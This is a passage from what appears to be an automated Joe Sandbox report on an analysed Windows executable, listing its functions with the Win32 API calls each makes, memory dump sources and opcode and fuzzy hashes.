                                  • PostMessageW.USER32(00000001,00000201,00000001), ref: 003B19C1
                                  • Sleep.KERNEL32(00000000,?,?,?), ref: 003B19C9
                                  • PostMessageW.USER32(00000001,00000202,00000000), ref: 003B19DA
                                  • Sleep.KERNEL32(00000000,?,?,?,?), ref: 003B19E2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: MessagePostSleep$RectWindow
                                  • String ID:
                                  • API String ID: 3382505437-0
                                  • Opcode ID: cad92bc89d42b6134c979df733c5334119831dfa508e6cd06bc955ff93133348
                                  • Instruction ID: 8b74d23c13c8c7f8b8d8deaf5074ed5a44d5519e7a4c2eb9bc5966a3de82f321
                                  • Opcode Fuzzy Hash: cad92bc89d42b6134c979df733c5334119831dfa508e6cd06bc955ff93133348
                                  • Instruction Fuzzy Hash: 4131C271A00259EFCB15CFA8CDA9ADE7BB5EB45319F104325FA21AB2D1C7709944CB90
                                  Function 003E5706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SendMessageW.USER32(?,00001053,000000FF,?), ref: 003E5745
                                  • SendMessageW.USER32(?,00001074,?,00000001), ref: 003E579D
                                  • _wcslen.LIBCMT ref: 003E57AF
                                  • _wcslen.LIBCMT ref: 003E57BA
                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 003E5816
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: MessageSend$_wcslen
                                  • String ID:
                                  • API String ID: 763830540-0
                                  • Opcode ID: 9d7ce02778b8a7e3cecce6d0afc76a4a47bbf604aeae1851ac3204e541938f02
                                  • Instruction ID: a26629ea1c1358d4961f198741879df61c8c30cc63a54437c1391ae83fba4ce3
                                  • Opcode Fuzzy Hash: 9d7ce02778b8a7e3cecce6d0afc76a4a47bbf604aeae1851ac3204e541938f02
                                  • Instruction Fuzzy Hash: 192175719046A89ADB229F62CC85AEEB77CFF04728F108316F919DA2C1D7709985CF50
                                  Function 003D0930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                  Download Yara Rule
                                  APIs
                                  • IsWindow.USER32(00000000), ref: 003D0951
                                  • GetForegroundWindow.USER32 ref: 003D0968
                                  • GetDC.USER32(00000000), ref: 003D09A4
                                  • GetPixel.GDI32(00000000,?,00000003), ref: 003D09B0
                                  • ReleaseDC.USER32(00000000,00000003), ref: 003D09E8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Window$ForegroundPixelRelease
                                  • String ID:
                                  • API String ID: 4156661090-0
                                  • Opcode ID: 0b832d8b5403927bc5e16a5bc2cb338165cb8d61fc5c0190d31a0295c8579c52
                                  • Instruction ID: 3e06267fd9dca2477c5ffa7ba3be43ec25113743aec16b36a93ac2bfdc98803d
                                  • Opcode Fuzzy Hash: 0b832d8b5403927bc5e16a5bc2cb338165cb8d61fc5c0190d31a0295c8579c52
                                  • Instruction Fuzzy Hash: F621A435600204AFD715EF65D884E9FB7E9EF45700F04852DE846DB362DB30AC04CB90
                                  Function 0038CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetEnvironmentStringsW.KERNEL32 ref: 0038CDC6
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0038CDE9
                                    • Part of subcall function 00383820: RtlAllocateHeap.NTDLL(00000000,?,00421444,?,0036FDF5,?,?,0035A976,00000010,00421440,003513FC,?,003513C6,?,00351129), ref: 00383852
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0038CE0F
                                  • _free.LIBCMT ref: 0038CE22
                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0038CE31
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                  • String ID:
                                  • API String ID: 336800556-0
                                  • Opcode ID: f0ea75180403d70c9c48448b6a0d30e570d878c3a06f62ab929a21748b5bac15
                                  • Instruction ID: 0019697b25b3035a06882b4b182a04d8114c7f4e09c194c8d2d67a473b13856a
                                  • Opcode Fuzzy Hash: f0ea75180403d70c9c48448b6a0d30e570d878c3a06f62ab929a21748b5bac15
                                  • Instruction Fuzzy Hash: F001D8726113557F633336766C88C7F696DDFC6BA27161269F905CB240DA709D0283B0
                                  Function 00369639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                                  Download Yara Rule
                                  APIs
                                  • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00369693
                                  • SelectObject.GDI32(?,00000000), ref: 003696A2
                                  • BeginPath.GDI32(?), ref: 003696B9
                                  • SelectObject.GDI32(?,00000000), ref: 003696E2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: ObjectSelect$BeginCreatePath
                                  • String ID:
                                  • API String ID: 3225163088-0
                                  • Opcode ID: aa7eef03a41874ad1ad41104f964a72a174407449c3d732e595602c88dc762e7
                                  • Instruction ID: 8f93a489103686410145a3fc39ab36c9510457983df013ce47cfdf6b64919132
                                  • Opcode Fuzzy Hash: aa7eef03a41874ad1ad41104f964a72a174407449c3d732e595602c88dc762e7
                                  • Instruction Fuzzy Hash: 4D2180B0912345EFDB229F24DC547AD3BACBB21325F518226F410A61F4D3709893CF98
                                  Function 003B5711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: _memcmp
                                  • String ID:
                                  • API String ID: 2931989736-0
                                  • Opcode ID: 76591bb88f0776c3864413c41cac8af6ec7d1c1d727d5004d0b8c204a50e3cb0
                                  • Instruction ID: 2c24a8a0747705b7e0e11fbc88914b429b7602ffd8f963bc6f0fa8a1e65c02ba
                                  • Opcode Fuzzy Hash: 76591bb88f0776c3864413c41cac8af6ec7d1c1d727d5004d0b8c204a50e3cb0
                                  • Instruction Fuzzy Hash: B0019276741A19BEF21B65159D83FFA735C9B2139CB204120FE089EA81FB64EE1182A0
                                  Function 00382DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • GetLastError.KERNEL32(?,?,?,0037F2DE,00383863,00421444,?,0036FDF5,?,?,0035A976,00000010,00421440,003513FC,?,003513C6), ref: 00382DFD
                                  • _free.LIBCMT ref: 00382E32
                                  • _free.LIBCMT ref: 00382E59
                                  • SetLastError.KERNEL32(00000000,00351129), ref: 00382E66
                                  • SetLastError.KERNEL32(00000000,00351129), ref: 00382E6F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: ErrorLast$_free
                                  • String ID:
                                  • API String ID: 3170660625-0
                                  • Opcode ID: 9725d015ba8417a9b490aa3b977a8b9cb090e6c7be791085118db1605834bb46
                                  • Instruction ID: c29353c6f4442ab1eaa12fca48fee69f10e5487c1282e5266d379b24856a2e3c
                                  • Opcode Fuzzy Hash: 9725d015ba8417a9b490aa3b977a8b9cb090e6c7be791085118db1605834bb46
                                  • Instruction Fuzzy Hash: 97012D3624570077C62337346C85D6F155DAFC1771B2645A5F421962D3EF38AC014724
                                  Function 003B000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,003AFF41,80070057,?,?,?,003B035E), ref: 003B002B
                                  • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,003AFF41,80070057,?,?), ref: 003B0046
                                  • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,003AFF41,80070057,?,?), ref: 003B0054
                                  • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,003AFF41,80070057,?), ref: 003B0064
                                  • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,003AFF41,80070057,?,?), ref: 003B0070
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: From$Prog$FreeStringTasklstrcmpi
                                  • String ID:
                                  • API String ID: 3897988419-0
                                  • Opcode ID: 96cfcc928ba67d6792a2baba6f1a783af9fbf13196a48a5ea02bc418ec895e42
                                  • Instruction ID: 0c0d28d9d70fcc146c298e59a2c3abae0dd0383492a67084f98ff6b246b52889
                                  • Opcode Fuzzy Hash: 96cfcc928ba67d6792a2baba6f1a783af9fbf13196a48a5ea02bc418ec895e42
                                  • Instruction Fuzzy Hash: 6001DB72610204BFDB276F68DC84BEF7AADEB44396F105224FA05DA210EB70DD008BA0
                                  Function 003BE97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • QueryPerformanceCounter.KERNEL32(?), ref: 003BE997
                                  • QueryPerformanceFrequency.KERNEL32(?), ref: 003BE9A5
                                  • Sleep.KERNEL32(00000000), ref: 003BE9AD
                                  • QueryPerformanceCounter.KERNEL32(?), ref: 003BE9B7
                                  • Sleep.KERNEL32 ref: 003BE9F3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                  • String ID:
                                  • API String ID: 2833360925-0
                                  • Opcode ID: 925a473c923685c87215e63215faaee3046d45470e69b7e760ab6e822c72bbee
                                  • Instruction ID: 4477d81d8c3c8d6bac5d8d97bc562fc9d2e2c3ce56a715d5c987b0f86e990b8c
                                  • Opcode Fuzzy Hash: 925a473c923685c87215e63215faaee3046d45470e69b7e760ab6e822c72bbee
                                  • Instruction Fuzzy Hash: DF016D31C11529DBCF119FE9DC996DDBB78FF09305F010656E602B6680CB34A559C7A1
                                  Function 003B10F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 003B1114
                                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,003B0B9B,?,?,?), ref: 003B1120
                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,003B0B9B,?,?,?), ref: 003B112F
                                  • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,003B0B9B,?,?,?), ref: 003B1136
                                  • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 003B114D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                  • String ID:
                                  • API String ID: 842720411-0
                                  • Opcode ID: dfe16153dfb08f172fbaf6345968fc88d874bc7430adb1f6de89a83c813410a1
                                  • Instruction ID: 6214c9a98873cfb5dfcd356418e7d40bd01e4a5147e3735694ab5874a8f0b0a7
                                  • Opcode Fuzzy Hash: dfe16153dfb08f172fbaf6345968fc88d874bc7430adb1f6de89a83c813410a1
                                  • Instruction Fuzzy Hash: 67016D75100205BFDB224F68DC89AAE3B6EEF86364F110418FA41C7390DA31DC018A60
                                  Function 003B0FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 003B0FCA
                                  • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 003B0FD6
                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 003B0FE5
                                  • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 003B0FEC
                                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 003B1002
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                  • String ID:
                                  • API String ID: 44706859-0
                                  • Opcode ID: 9f310bf2b54cef3d62e93097c68b8cb0db6ad4a92b865672cbd3569ca5352ed5
                                  • Instruction ID: eb53582e1bdbfa3ad4cb33db8e8672435578459480c9dd9820b2fe2f5b757552
                                  • Opcode Fuzzy Hash: 9f310bf2b54cef3d62e93097c68b8cb0db6ad4a92b865672cbd3569ca5352ed5
                                  • Instruction Fuzzy Hash: 92F0CD39200349EBDB221FA4DC8DF9A3BADEF8A762F510414FE05CB290CA30DC418A60
                                  Function 003B1014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 003B102A
                                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 003B1036
                                  • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003B1045
                                  • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 003B104C
                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003B1062
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                  • String ID:
                                  • API String ID: 44706859-0
                                  • Opcode ID: a24c72e87a98c01768b994a4150758f337c6d3ac5230ccf49dbeaf9ac96de9fe
                                  • Instruction ID: 9b420c2d080b783bcd48d1945ce9d9af5cc5f0ddbcae06e3243bc60490d01afb
                                  • Opcode Fuzzy Hash: a24c72e87a98c01768b994a4150758f337c6d3ac5230ccf49dbeaf9ac96de9fe
                                  • Instruction Fuzzy Hash: 76F06D39210345EBDB236FA4EC99F9A3BADEF8A761F510514FE45CB290CA70DC418A60
                                  Function 003C030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                  Download Yara Rule
                                  APIs
                                  • CloseHandle.KERNEL32(?,?,?,?,003C017D,?,003C32FC,?,00000001,00392592,?), ref: 003C0324
                                  • CloseHandle.KERNEL32(?,?,?,?,003C017D,?,003C32FC,?,00000001,00392592,?), ref: 003C0331
                                  • CloseHandle.KERNEL32(?,?,?,?,003C017D,?,003C32FC,?,00000001,00392592,?), ref: 003C033E
                                  • CloseHandle.KERNEL32(?,?,?,?,003C017D,?,003C32FC,?,00000001,00392592,?), ref: 003C034B
                                  • CloseHandle.KERNEL32(?,?,?,?,003C017D,?,003C32FC,?,00000001,00392592,?), ref: 003C0358
                                  • CloseHandle.KERNEL32(?,?,?,?,003C017D,?,003C32FC,?,00000001,00392592,?), ref: 003C0365
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: CloseHandle
                                  • String ID:
                                  • API String ID: 2962429428-0
                                  • Opcode ID: 3630f2e21076c69da348800c82b2794d968ca8373476e249ba82adf8087f36e3
                                  • Instruction ID: e28b4631fe0ff5c4d22437f810324311ac7bc61bca299c993a06bfc263c887c9
                                  • Opcode Fuzzy Hash: 3630f2e21076c69da348800c82b2794d968ca8373476e249ba82adf8087f36e3
                                  • Instruction Fuzzy Hash: 6601D076800B85CFCB32AF66D880806FBF9BE503153068A3ED19292931C370A945CF80
                                  Function 0038D73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • _free.LIBCMT ref: 0038D752
                                    • Part of subcall function 003829C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0038D7D1,00000000,00000000,00000000,00000000,?,0038D7F8,00000000,00000007,00000000,?,0038DBF5,00000000), ref: 003829DE
